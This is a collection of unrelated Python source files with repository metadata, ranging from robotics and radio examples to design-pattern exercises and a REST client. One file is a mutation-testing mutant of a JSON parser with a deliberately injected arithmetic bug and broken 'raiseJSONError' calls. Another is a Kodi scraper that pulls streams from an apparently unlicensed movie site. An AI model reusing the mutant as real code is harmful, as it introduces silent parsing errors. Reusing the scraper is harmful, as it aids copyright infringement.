| permissive | erwincoumans/bullet3 | 4ff9e0aa64b641c65b57b26f415dd69dbfb12256 | 6d181d78a5c7be8714c74055cddcf63d5ccef70a | refs/heads/master | 2023-03-10T14:58:18.072562 | 2023-02-24T18:32:53 | 2023-02-24T18:32:53 | 31,621,748 | 103 | 29 | NOASSERTION | 2019-02-25T17:31:00 | 2015-03-03T21:15:54 | C++ | UTF-8 | Python | false | false | 685 | py | """Gait pattern planning module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import enum
class LegState(enum.Enum):
"""The state of a leg during locomotion."""
SWING = 0
STANCE = 1
# A swing leg that collides with the ground.
EARLY_CONTACT = 2
# A stance leg that loses contact.
LOSE_CONTACT = 3
class GaitGenerator(object): # pytype: disable=ignored-metaclass
"""Generates the leg swing/stance pattern for the robot."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def reset(self, current_time):
pass
@abc.abstractmethod
def update(self, current_time):
pass
| [
"[email protected]"
]
| |
6413512eb598e1e8364fa9fbecd51fc794c7d5e3 | 395f974e62eafed74572efebcd91d62966e61639 | /examples/microjson/mutants/AOR_BinOp_mutant_1486201075.py | 5d5230b65975c8dfcad7628802b49a4a92723753 | [
"Apache-2.0"
]
| permissive | agroce/tstl | ad386d027f0f5ff750eab19a722a4b119ed39211 | 8d43ef7fa49534868e6cdf1697863748260405c7 | refs/heads/master | 2023-08-08T19:14:52.020314 | 2023-07-26T17:51:36 | 2023-07-26T17:51:36 | 32,408,285 | 106 | 33 | NOASSERTION | 2021-01-26T19:05:17 | 2015-03-17T17:14:04 | Python | UTF-8 | Python | false | false | 8,312 | py | import math
import StringIO
import types
__pychecker__ = 'no-returnvalues'
WS = set([' ', '\t', '\r', '\n', '\x08', '\x0c'])
DIGITS = set([str(i) for i in range(0, 10)])
NUMSTART = DIGITS.union(['.', '-', '+'])
NUMCHARS = NUMSTART.union(['e', 'E'])
ESC_MAP = {'n': '\n', 't': '\t', 'r': '\r', 'b': '\x08', 'f': '\x0c'}
REV_ESC_MAP = dict([(_v, _k) for (_k, _v) in ESC_MAP.items()] + [('"', '"')])
E_BYTES = 'input string must be type str containing ASCII or UTF-8 bytes'
E_MALF = 'malformed JSON data'
E_TRUNC = 'truncated JSON data'
E_BOOL = 'expected boolean'
E_NULL = 'expected null'
E_LITEM = 'expected list item'
E_DKEY = 'expected key'
E_COLON = 'missing colon after key'
E_EMPTY = 'found empty string, not valid JSON data'
E_BADESC = 'bad escape character found'
E_UNSUPP = 'unsupported type "%s" cannot be JSON-encoded'
E_BADFLOAT = 'cannot emit floating point value "%s"'
NEG_INF = float('-inf')
POS_INF = float('inf')
class JSONError(Exception):
def __init__(self, msg, stm=None, pos=0):
if stm:
msg += ' at position %d, "%s"' % (pos, repr(stm.substr(pos, 32)))
Exception.__init__(self, msg)
class JSONStream(object):
def __init__(self, data):
self._stm = StringIO.StringIO(data)
@property
def pos(self):
return self._stm.pos
@property
def len(self):
return self._stm.len
def getvalue(self):
return self._stm.getvalue()
def skipspaces(self):
'post-cond: read pointer will be over first non-WS char'
self._skip(lambda c: (c not in WS))
def _skip(self, stopcond):
while True:
c = self.peek()
if (stopcond(c) or (c == '')):
break
self.next()
def next(self, size=1):
return self._stm.read(size)
def next_ord(self):
return ord(self.next())
def peek(self):
if (self.pos == self.len):
return ''
return self.getvalue()[self.pos]
def substr(self, pos, length):
return self.getvalue()[pos:pos + length]
def _decode_utf8(c0, stm):
c0 = ord(c0)
r = 65533
nc = stm.next_ord
if (c0 & 224 == 192):
r = c0 & 31 << 6 + nc() & 63
elif (c0 & 240 == 224):
r = c0 / 15 << 12 + nc() & 63 << 6 + nc() & 63
elif (c0 & 248 == 240):
r = c0 & 7 << 18 + nc() & 63 << 12 + nc() & 63 << 6 + nc() & 63
return unichr(r)
def decode_escape(c, stm):
v = ESC_MAP.get(c, None)
if (v is not None):
return v
elif (c != 'u'):
return c
sv = 12
r = 0
for _ in range(0, 4):
r |= int(stm.next(), 16) << sv
sv -= 4
return unichr(r)
def _from_json_string(stm):
stm.next()
r = []
while True:
c = stm.next()
if (c == ''):
raiseJSONError(E_TRUNC, stm, stm.pos - 1)
elif (c == '\\'):
c = stm.next()
r.append(decode_escape(c, stm))
elif (c == '"'):
return ''.join(r)
elif (c > '\x7f'):
r.append(_decode_utf8(c, stm))
else:
r.append(c)
def _from_json_fixed(stm, expected, value, errmsg):
off = len(expected)
pos = stm.pos
if (stm.substr(pos, off) == expected):
stm.next(off)
return value
raiseJSONError(errmsg, stm, pos)
def _from_json_number(stm):
is_float = 0
saw_exp = 0
pos = stm.pos
while True:
c = stm.peek()
if (c not in NUMCHARS):
break
elif ((c == '-') and (not saw_exp)):
pass
elif (c in ('.', 'e', 'E')):
is_float = 1
if (c in ('e', 'E')):
saw_exp = 1
stm.next()
s = stm.substr(pos, stm.pos - pos)
if is_float:
return float(s)
return long(s)
def _from_json_list(stm):
stm.next()
result = []
pos = stm.pos
while True:
stm.skipspaces()
c = stm.peek()
if (c == ''):
raiseJSONError(E_TRUNC, stm, pos)
elif (c == ']'):
stm.next()
return result
elif (c == ','):
stm.next()
result.append(_from_json_raw(stm))
continue
elif (not result):
result.append(_from_json_raw(stm))
continue
else:
raiseJSONError(E_MALF, stm, stm.pos)
def _from_json_dict(stm):
stm.next()
result = {}
expect_key = 0
pos = stm.pos
while True:
stm.skipspaces()
c = stm.peek()
if (c == ''):
raiseJSONError(E_TRUNC, stm, pos)
if (c in ('}', ',')):
stm.next()
if expect_key:
raiseJSONError(E_DKEY, stm, stm.pos)
if (c == '}'):
return result
expect_key = 1
continue
elif (c == '"'):
key = _from_json_string(stm)
stm.skipspaces()
c = stm.next()
if (c != ':'):
raiseJSONError(E_COLON, stm, stm.pos)
stm.skipspaces()
val = _from_json_raw(stm)
result[key] = val
expect_key = 0
continue
raiseJSONError(E_MALF, stm, stm.pos)
def _from_json_raw(stm):
while True:
stm.skipspaces()
c = stm.peek()
if (c == '"'):
return _from_json_string(stm)
elif (c == '{'):
return _from_json_dict(stm)
elif (c == '['):
return _from_json_list(stm)
elif (c == 't'):
return _from_json_fixed(stm, 'true', True, E_BOOL)
elif (c == 'f'):
return _from_json_fixed(stm, 'false', False, E_BOOL)
elif (c == 'n'):
return _from_json_fixed(stm, 'null', None, E_NULL)
elif (c in NUMSTART):
return _from_json_number(stm)
raiseJSONError(E_MALF, stm, stm.pos)
def from_json(data):
"\n Converts 'data' which is UTF-8 (or the 7-bit pure ASCII subset) into\n a Python representation. You must pass bytes to this in a str type,\n not unicode.\n "
if (not isinstance(data, str)):
raiseJSONError(E_BYTES)
if (not data):
return None
stm = JSONStream(data)
return _from_json_raw(stm)
def _to_json_list(stm, lst):
seen = 0
stm.write('[')
for elem in lst:
if seen:
stm.write(',')
seen = 1
_to_json_object(stm, elem)
stm.write(']')
def _to_json_string(stm, buf):
stm.write('"')
for c in buf:
nc = REV_ESC_MAP.get(c, None)
if nc:
stm.write('\\' + nc)
elif (ord(c) <= 127):
stm.write(str(c))
else:
stm.write('\\u%04x' % ord(c))
stm.write('"')
def _to_json_dict(stm, dct):
seen = 0
stm.write('{')
for key in dct.keys():
if seen:
stm.write(',')
seen = 1
val = dct[key]
if (not (type(key) in (types.StringType, types.UnicodeType))):
key = str(key)
_to_json_string(stm, key)
stm.write(':')
_to_json_object(stm, val)
stm.write('}')
def _to_json_object(stm, obj):
if isinstance(obj, (types.ListType, types.TupleType)):
_to_json_list(stm, obj)
elif isinstance(obj, types.BooleanType):
if obj:
stm.write('true')
else:
stm.write('false')
elif isinstance(obj, types.FloatType):
if (not (NEG_INF < obj < POS_INF)):
raiseJSONError(E_BADFLOAT % obj)
stm.write('%s' % obj)
elif isinstance(obj, (types.IntType, types.LongType)):
stm.write('%d' % obj)
elif isinstance(obj, types.NoneType):
stm.write('null')
elif isinstance(obj, (types.StringType, types.UnicodeType)):
_to_json_string(stm, obj)
elif (hasattr(obj, 'keys') and hasattr(obj, '__getitem__')):
_to_json_dict(stm, obj)
elif hasattr(obj, '__unicode__'):
_to_json_string(stm, obj.__unicode__())
elif hasattr(obj, '__str__'):
_to_json_string(stm, obj.__str__())
else:
raiseJSONError(E_UNSUPP % type(obj))
def to_json(obj):
"\n Converts 'obj' to an ASCII JSON string representation.\n "
stm = StringIO.StringIO('')
_to_json_object(stm, obj)
return stm.getvalue()
decode = from_json
encode = to_json | [
"[email protected]"
]
| |
64608d15d268eb8a172554ecfb7235b36b175d0b | 677a3a76807d8585f65ec0e0839bb3a8b833e2fb | /10.Design Patterns/Lab/1.Abstract_factory.py | cd4cff1cf3cb94f6f195c13a8447e4bec28e90a5 | []
| no_license | negative0101/Python-OOP | 0d531a1b72beb3e58f9486df88d457ecd59be10e | b5825e66a909c947a46458712d683e8a38035912 | refs/heads/main | 2023-07-14T11:27:34.841594 | 2021-08-20T08:49:04 | 2021-08-20T08:49:04 | 381,475,313 | 0 | 0 | null | 2021-07-25T19:52:38 | 2021-06-29T19:26:42 | Python | UTF-8 | Python | false | false | 1,724 | py | from abc import ABC, abstractmethod
class Chair:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class Sofa:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class Table:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class AbstractFactory(ABC):
@abstractmethod
def create_chair(self):
pass
@abstractmethod
def create_table(self):
pass
@abstractmethod
def create_sofa(self):
pass
class VictorianFactory(AbstractFactory):
def create_chair(self):
return Chair('Victorian chair')
def create_sofa(self):
return Sofa('Victorian sofa')
def create_table(self):
return Table('Victorian table')
class ArtFactory(AbstractFactory):
def create_chair(self):
return Chair('Art chair')
def create_sofa(self):
return Sofa('Art sofa')
def create_table(self):
return Table('Art table')
class ModernFactory(AbstractFactory):
def create_chair(self):
return Chair('Modern chair')
def create_sofa(self):
return Sofa('Modern sofa')
def create_table(self):
return Table('Modern table')
def get_factory(style):
if style == 'Victorian':
return VictorianFactory()
elif style == 'Art':
return ArtFactory()
elif style == 'Modern':
return ModernFactory()
if __name__ == '__main__':
client_style = input()
factory = get_factory(client_style)
print(factory.create_chair()) | [
"[email protected]"
]
| |
3d7ce7f23f60f696a1c6fc3dad73799d24bb83a9 | 2bcc421ee345b00cf805c543b37d18b5d019dc04 | /adafruit-circuitpython-bundle-6.x-mpy-20201126/examples/rfm69_transmit.py | 8f290230a0177f4531c020ba3597b90cb31b0bc0 | []
| no_license | saewoonam/sc-current-source-titano | 5a1ad46889c1b09c168424901fd71cb4eab5c61b | 1c136aa8b61268d9ac0b5a682b30ece70ab87663 | refs/heads/main | 2023-03-02T22:12:26.685537 | 2021-02-09T03:28:01 | 2021-02-09T03:28:01 | 317,299,900 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,895 | py | # Example to send a packet periodically
# Author: Jerry Needell
#
import time
import board
import busio
import digitalio
import adafruit_rfm69
# set the time interval (seconds) for sending packets
transmit_interval = 10
# Define radio parameters.
RADIO_FREQ_MHZ = 915.0 # Frequency of the radio in Mhz. Must match your
# module! Can be a value like 915.0, 433.0, etc.
# Define pins connected to the chip.
CS = digitalio.DigitalInOut(board.CE1)
RESET = digitalio.DigitalInOut(board.D25)
# Initialize SPI bus.
spi = busio.SPI(board.SCK, MOSI=board.MOSI, MISO=board.MISO)
# Initialze RFM radio
rfm69 = adafruit_rfm69.RFM69(spi, CS, RESET, RADIO_FREQ_MHZ)
# Optionally set an encryption key (16 byte AES key). MUST match both
# on the transmitter and receiver (or be set to None to disable/the default).
rfm69.encryption_key = (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"
)
# initialize counter
counter = 0
# send a broadcast mesage
rfm69.send(bytes("message number {}".format(counter), "UTF-8"))
# Wait to receive packets.
print("Waiting for packets...")
# initialize flag and timer
send_reading = False
time_now = time.monotonic()
while True:
# Look for a new packet - wait up to 5 seconds:
packet = rfm69.receive(timeout=5.0)
# If no packet was received during the timeout then None is returned.
if packet is not None:
# Received a packet!
# Print out the raw bytes of the packet:
print("Received (raw bytes): {0}".format(packet))
# send reading after any packet received
if time.monotonic() - time_now > transmit_interval:
# reset timeer
time_now = time.monotonic()
# clear flag to send data
send_reading = False
counter = counter + 1
rfm69.send(bytes("message number {}".format(counter), "UTF-8"))
| [
"[email protected]"
]
| |
8a3659cc339b77f4682c2220d784c46a647f5a6a | 5b76a92ec02529f97bcf72ba2487f11b73684439 | /pyxel_lander/__init__.py | 40a9993bd4c8b06058baaef719dbb92ea720489a | [
"MIT"
]
| permissive | humrochagf/pyxel-lander | d9533598a56a1adba4c335167620950868bcec6b | 05b76c45de69f7fa1ecf78cf1ba555e8771d3bfc | refs/heads/main | 2023-03-08T06:18:39.555621 | 2023-03-06T02:18:09 | 2023-03-06T02:18:09 | 163,335,210 | 28 | 3 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | from pyxel_lander.constants import AUTHOR, EMAIL, VERSION
from pyxel_lander.game import Game
__author__ = AUTHOR
__email__ = EMAIL
__version__ = VERSION
__all__ = [
"__author__",
"__email__",
"__version__",
"Game",
]
| [
"[email protected]"
]
| |
3082243e987f916fa7c31952331a62d65983a72c | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /4jNjHdZ2hmMh23pRg_8.py | def823a82703336877c1698b26cb5997d5eaa82f | []
| no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py |
def cutting_grass(lst, *cuts):
lsts = [[e - sum(cuts[:i+1]) for e in lst] for i in range(len(cuts))]
return [i if all(e > 0 for e in i) else 'Done' for i in lsts]
| [
"[email protected]"
]
| |
d2d5e2724e5868e3de00fc519848b82369742bab | e62c8ee151671b999c6720ab8c2aa2f96c0d7f55 | /examples/miniapps/boto3-session/boto3_session_example.py | 33ed85f6dd4ffb0cf0fd7d12844a69a572b02a71 | []
| permissive | ets-labs/python-dependency-injector | 45645973456bb6494386ad12103d06e1f1be2cd8 | cc2304e46e054ae08dc12995428759fbfb51af10 | refs/heads/master | 2023-08-23T03:59:53.509743 | 2022-12-19T03:14:24 | 2022-12-19T03:14:24 | 28,774,758 | 3,217 | 273 | BSD-3-Clause | 2023-09-08T21:46:18 | 2015-01-04T13:23:05 | Python | UTF-8 | Python | false | false | 2,053 | py | """Boto3 session example."""
import boto3.session
from dependency_injector import containers, providers
class Service:
def __init__(self, s3_client, sqs_client):
self.s3_client = s3_client
self.sqs_client = sqs_client
class Container(containers.DeclarativeContainer):
config = providers.Configuration()
session = providers.Resource(
boto3.session.Session,
aws_access_key_id=config.aws_access_key_id,
aws_secret_access_key=config.aws_secret_access_key,
aws_session_token=config.aws_session_token,
)
s3_client = providers.Resource(
session.provided.client.call(),
service_name="s3",
)
sqs_client = providers.Resource(
providers.MethodCaller(session.provided.client), # Alternative syntax
service_name="sqs",
)
service1 = providers.Factory(
Service,
s3_client=s3_client,
sqs_client=sqs_client,
)
service2 = providers.Factory(
Service,
s3_client=session.provided.client.call(service_name="s3"), # Alternative inline syntax
sqs_client=session.provided.client.call(service_name="sqs"), # Alternative inline syntax
)
def main():
container = Container()
container.config.aws_access_key_id.from_env("AWS_ACCESS_KEY_ID")
container.config.aws_secret_access_key.from_env("AWS_SECRET_ACCESS_KEY")
container.config.aws_session_token.from_env("AWS_SESSION_TOKEN")
container.init_resources()
s3_client = container.s3_client()
print(s3_client)
sqs_client = container.sqs_client()
print(sqs_client)
service1 = container.service1()
print(service1, service1.s3_client, service1.sqs_client)
assert service1.s3_client is s3_client
assert service1.sqs_client is sqs_client
service2 = container.service2()
print(service2, service2.s3_client, service2.sqs_client)
assert service2.s3_client.__class__.__name__ == "S3"
assert service2.sqs_client.__class__.__name__ == "SQS"
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
570a9766aa5228126ece666542ba521ded51bb84 | 37d10412479a81c652e3ebf0c21c101b68fe1b4d | /rebecca/bootstrapui/helpers.py | 7c850d56c33719949e736ca874ba579b29d7a7d6 | [
"MIT"
]
| permissive | rebeccaframework/rebecca.bootstrapui | 97bfde14861d9b318fd1b0087a30c10cfbc18da3 | e247aead62e75009256d8341a893b173ccfe3b10 | refs/heads/master | 2020-05-18T15:50:27.364424 | 2014-08-23T10:18:21 | 2014-08-23T10:18:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | import functools
from webhelpers2.html import HTML, escape, literal
from babel.dates import format_date, format_datetime, format_time
from babel.numbers import format_number, format_decimal, format_percent
def bind_locale(func, localename):
return functools.partial(func, locale=localename)
class WebHelper(object):
def __init__(self, request):
self.request = request
self.locale_name = request.locale_name
self.HTML = HTML
self.escape = escape
self.literal = literal
self.format_date = bind_locale(format_date, self.locale_name)
self.format_datetime = bind_locale(format_datetime, self.locale_name)
self.format_time = bind_locale(format_time, self.locale_name)
self.format_number = bind_locale(format_number, self.locale_name)
self.format_decimal = bind_locale(format_decimal, self.locale_name)
self.format_percent = bind_locale(format_percent, self.locale_name)
| [
"[email protected]"
]
| |
5dc668e60985444fd9aa28246684e0b119ddea80 | 88ea6ae5a8f97e3771490583d8acecdbe2877fd8 | /zips/plugin.video.vistatv/resources/lib/sources/en/watch32.py | e4449b2214e5d64dd66cc38e81ebeb999833a20b | []
| no_license | staycanuca/PersonalDataVistaTV | 26497a29e6f8b86592609e7e950d6156aadf881c | 4844edbfd4ecfc1d48e31432c39b9ab1b3b1a222 | refs/heads/master | 2021-01-25T14:46:25.763952 | 2018-03-03T10:48:06 | 2018-03-03T10:48:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,798 | py | # -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @tantrumdev wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
##Cerebro ShowBox Scraper
#Cerebro ShowBox Scraper
# Addon Provider: MuadDib
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
from resources.lib.modules import source_utils
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['watch32hd.co']
self.base_link = 'https://watch32hd.co'
self.search_link = '/watch?v=%s_%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['title']
year = data['year']
url = urlparse.urljoin(self.base_link, self.search_link)
url = url % (title.replace(':', ' ').replace(' ','_'),year)
search_results = client.request(url)
varid = re.compile('var frame_url = "(.+?)"',re.DOTALL).findall(search_results)[0].replace('/embed/','/streamdrive/info/')
res_chk = re.compile('class="title"><h1>(.+?)</h1>',re.DOTALL).findall(search_results)[0]
varid = 'http:'+varid
holder = client.request(varid)
links = re.compile('"src":"(.+?)"',re.DOTALL).findall(holder)
for link in links:
vid_url = link.replace('\\','')
if '1080' in res_chk:
quality = '1080p'
elif '720' in res_chk:
quality = '720p'
else:
quality = 'DVD'
sources.append({'source': 'Googlelink', 'quality': quality, 'language': 'en', 'url': vid_url, 'direct': False, 'debridonly': False})
return sources
except:
return sources
def resolve(self, url):
return url | [
"[email protected]"
]
| |
bc500ba176b2434f5fb8c5f9ef04e5625cd2fe98 | ce8563184a6cf8210279b79cd1ccfd4040e35b55 | /src/ebay_rest/api/sell_listing/rest.py | 1f94ccb346b94bc05b402e233e6d6cb5bfa8b4fc | [
"MIT"
]
| permissive | craiga/ebay_rest | 43dc107f9eeba9a04924f36ee8cf57af3854bc9a | a0be2677c65a787e9566df848ffa3ad0c309a9d9 | refs/heads/main | 2023-08-29T09:14:08.896434 | 2021-09-05T23:07:36 | 2021-09-05T23:07:36 | 411,585,541 | 0 | 0 | MIT | 2021-09-29T08:10:44 | 2021-09-29T08:10:43 | null | UTF-8 | Python | false | false | 13,642 | py | # coding: utf-8
"""
Listing API
<span class=\"tablenote\"><b>Note:</b> This is a <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#limited\" target=\"_blank\"> <img src=\"/cms/img/docs/partners-api.svg\" class=\"legend-icon partners-icon\" title=\"Limited Release\" alt=\"Limited Release\" />(Limited Release)</a> API available only to select developers approved by business units.</span><br /><br />Enables a seller adding an ad or item on a Partner's site to automatically create an eBay listing draft using the item details from the Partner's site. # noqa: E501
OpenAPI spec version: v1_beta.3.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = '{}'
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# In the python 3, the response.data is bytes.
# we need to decode it to string.
if six.PY3:
r.data = r.data.decode('utf8')
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message
| [
"[email protected]"
]
| |
12ec82e69e5b3d50651b488913b9e56d768c6259 | bd01527a0af06828c56206d1113c372787e0d1d0 | /backend/media/justrelax/node/media/player.py | 0fae154d42080e85207185137f7117e755f8f9ac | []
| no_license | nosseb/justrelax | 3810f3cbae507f3da3c7a0ab894e5c3236b8c9d1 | 812bdf7787a761c94afd867cfc4de20f993fc86a | refs/heads/master | 2022-11-26T22:12:33.825056 | 2020-07-21T15:42:27 | 2020-07-21T15:42:27 | 263,049,627 | 0 | 0 | null | 2020-05-11T13:24:52 | 2020-05-11T13:24:51 | null | UTF-8 | Python | false | false | 2,432 | py | from justrelax.common.logging_utils import logger
class MediaPlayerMixin:
STATE_NOT_STARTED = 'not_started'
STATE_PLAYING = 'playing'
STATE_PAUSED = 'paused'
def __init__(self):
self.current_state = MediaPlayerMixin.STATE_NOT_STARTED
def play(self):
if self.current_state == MediaPlayerMixin.STATE_NOT_STARTED:
logger.debug('Player has not been started yet')
self._play()
self.current_state = MediaPlayerMixin.STATE_PLAYING
elif self.current_state == MediaPlayerMixin.STATE_PLAYING:
logger.debug('Player is already playing')
logger.debug('Nothing to do')
elif self.current_state == MediaPlayerMixin.STATE_PAUSED:
logger.debug('Player is paused and had already been started')
self._resume()
self.current_state = MediaPlayerMixin.STATE_PLAYING
else:
pass
def pause(self):
if self.current_state == MediaPlayerMixin.STATE_NOT_STARTED:
logger.debug('Player has not been started yet')
logger.debug('Nothing to do')
elif self.current_state == MediaPlayerMixin.STATE_PLAYING:
logger.debug('Player is already playing')
self._pause()
self.current_state = MediaPlayerMixin.STATE_PAUSED
